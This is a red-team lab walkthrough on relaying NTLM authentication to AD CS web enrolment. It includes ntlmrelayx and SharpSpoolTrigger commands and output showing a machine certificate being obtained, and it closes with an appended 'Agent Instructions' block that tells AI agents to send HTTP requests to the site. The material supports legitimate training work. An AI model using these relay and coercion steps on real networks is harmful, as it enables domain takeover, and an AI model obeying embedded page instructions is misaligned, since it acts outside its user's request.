# NTLM Relaying to ADCS HTTP Endpoints AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at *http\[s]://\/certsrv***.** \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/35f/294/c07/certsrv.png) \\ If NTLM authentication is enabled, these endpoints are vulnerable to NTLM relay attacks. A common abuse method is to coerce a domain controller to authenticate to an attacker-controlled location, relay the request to a CA to obtain a certificate for that DC, and then use it to obtain a TGT. An important aspect to be aware of is that you cannot relay NTLM authentication back to the originating machine. We therefore wouldn't be able to relay a DC to a CA if those services were running on the same machine. This is indeed the case in the RTO lab, as each CA is running on a DC. Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation. We already have access to WEB as jking, but this is another way of achieving the same end. \\ To achieve this, we need: * PortBender on Workstation 2 to capture traffic on port 445 and redirect it to port 8445. * A reverse port forward to forward traffic hitting port 8445 to the team server on port 445. * A SOCKS proxy for ntlmrelayx to send traffic back into the network. \\ The ntlmrelayx command needs to target the `certfnsh.asp` page on the ADCS server. ``` attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections ``` \\ Then force the authentication to occur from WEB to WKSTN-2. ``` beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102 ``` ``` [*] Servers started, waiting for connections [*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10 |S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK [*] HTTP server returned error code 200, treating as a successful login [*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED [*] Generating CSR... [*] CSR generated! [*] Getting certificate... [*] GOT CERTIFICATE! ID 13 [*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE ``` \\ The S4U2Self trick can be used to obtain usable TGS's to move laterally to it. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/active-directory-certificate-services/ntlm-relaying-to-adcs-http-endpoints.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.